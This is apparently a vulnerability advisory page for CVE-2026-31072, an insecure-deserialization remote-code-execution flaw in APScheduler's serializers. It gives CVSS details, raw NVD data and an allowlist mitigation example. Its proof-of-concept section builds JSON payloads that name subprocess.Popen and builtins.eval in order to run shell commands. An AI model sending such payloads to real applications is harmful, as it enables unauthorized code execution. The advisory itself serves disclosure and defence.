Security Vulnerability Report
CVE-2026-31072 CVSS 9.8 CRITICAL

CVE-2026-31072

Published: 2026-05-19 16:16:21
Last Modified: 2026-05-20 17:16:21

Description

The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers.
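The defect the description names is the combination of resolving a class name taken from the payload by dynamic import and then handing that class attacker-controlled state through `__setstate__`. The mitigation for this class of bug (CWE-502) is to never resolve a payload-supplied name through the import system at all, but only through a fixed table of types the application expects, and to have even those types validate their state. The following is an added example written for this advisory, not APScheduler's own code: the wire keys `__class__`/`__state__`, the `JobRecord` class, the `ALLOWED_CLASSES` table and the helper names are constructed assumptions, and the hostile sample in `unmarshal_text`'s rejection path is a constructed input.

```python
"""Allowlist-gated object unmarshalling (added example, not APScheduler code).

The wire format {"__class__": "<name>", "__state__": {...}} and JobRecord are
constructed stand-ins. The technique is the CWE-502 mitigation: a payload may
only name classes that are already in ALLOWED_CLASSES; nothing else is ever
imported, instantiated, or given state via __setstate__.
"""
import json


class UnsafeDeserialization(ValueError):
    """Raised when a payload names a class that is not on the allowlist."""


class JobRecord:
    """Constructed example of a type the application legitimately persists."""

    def __init__(self, job_id, func_name):
        self.job_id = job_id
        self.func_name = func_name

    def __getstate__(self):
        return {"job_id": self.job_id, "func_name": self.func_name}

    def __setstate__(self, state):
        # Allowlisted classes still validate their state instead of trusting it.
        self.job_id = str(state["job_id"])
        self.func_name = str(state["func_name"])


def _wire_name(cls):
    """Stable dotted name used on the wire for an allowlisted class."""
    return f"{cls.__module__}.{cls.__qualname__}"


# The only classes a payload may name. Resolution goes through this dict and
# never through importlib, so a name such as "subprocess.Popen" is refused
# before any import or __setstate__ call can happen.
ALLOWED_CLASSES = {_wire_name(cls): cls for cls in (JobRecord,)}


def marshal_object(obj):
    """Serialize an allowlisted object into the constructed wire format."""
    name = _wire_name(type(obj))
    if name not in ALLOWED_CLASSES:
        raise UnsafeDeserialization(f"refusing to serialize {name!r}")
    return {"__class__": name, "__state__": obj.__getstate__()}


def unmarshal_object(doc):
    """Rebuild an object, resolving its class only via ALLOWED_CLASSES."""
    name = doc.get("__class__")
    cls = ALLOWED_CLASSES.get(name) if isinstance(name, str) else None
    if cls is None:
        raise UnsafeDeserialization(f"class not permitted: {name!r}")
    obj = cls.__new__(cls)
    obj.__setstate__(doc.get("__state__", {}))
    return obj


def payload_names_only_allowed_classes(json_text):
    """Boundary check: walk a decoded document and reject any "__class__"
    reference outside the allowlist before unmarshalling even starts."""

    def walk(node):
        if isinstance(node, dict):
            name = node.get("__class__")
            if "__class__" in node and (
                not isinstance(name, str) or name not in ALLOWED_CLASSES
            ):
                return False
            return all(walk(v) for v in node.values())
        if isinstance(node, list):
            return all(walk(v) for v in node)
        return True

    return walk(json.loads(json_text))


def marshal_text(obj):
    """JSON text for an allowlisted object."""
    return json.dumps(marshal_object(obj))


def unmarshal_text(json_text):
    """Parse JSON text and rebuild the object, or raise UnsafeDeserialization."""
    if not payload_names_only_allowed_classes(json_text):
        raise UnsafeDeserialization("payload references a non-allowlisted class")
    return unmarshal_object(json.loads(json_text))


def roundtrip(job_id, func_name):
    """Show the legitimate path works end to end; returns the restored fields."""
    obj = unmarshal_text(marshal_text(JobRecord(job_id, func_name)))
    return (obj.job_id, obj.func_name)
```

The allowlist is the whole fix: the serializer's structure (a class name plus a state mapping) is unchanged, but the name is a lookup key into a table the application controls rather than an argument to the import machinery. The separate `payload_names_only_allowed_classes` walk lets a service reject a hostile document at the network boundary and log it, without ever reaching the object-construction code.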

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

APScheduler all versions (including 3.10.x)
APScheduler 4.0.0a5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

# PoC for CVE-2026-31072: APScheduler Insecure Deserialization RCE
# This script generates a malicious JSON payload designed to exploit
# the unmarshal_object vulnerability in APScheduler.


def generate_malicious_payload():
    # The payload structure targets the unmarshal_object function.
    # It attempts to instantiate a class that executes a command.
    # Note: The specific class used depends on the Python environment available on the target.
    # Example: Targeting a class that runs a shell command via __setstate__
    # This structure mimics the behavior expected by the vulnerable serializer.
    payload = {
        "__class__": "subprocess.Popen",
        "__args__": [["touch", "/tmp/pwned"]]
    }
    # Alternatively, targeting os.system if the environment allows direct execution in __init__
    # payload = {
    #     "__class__": "builtins.eval",
    #     "__args__": ["__import__('os').system('id')"]
    # }
    return json.dumps(payload)


if __name__ == "__main__":
    print("[*] Generating malicious JSON payload for CVE-2026-31072...")
    payload = generate_malicious_payload()
    print(f"Payload: {payload}")
    print("[*] Send this payload to the vulnerable application endpoint.")
```

References

- https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6
- https://github.com/agronholm/apscheduler

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-31072",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T16:16:20.610",
    "lastModified": "2026-05-20T17:16:20.947",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/agronholm/apscheduler",
        "source": "[email protected]"
      },
      {
        "url": "https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```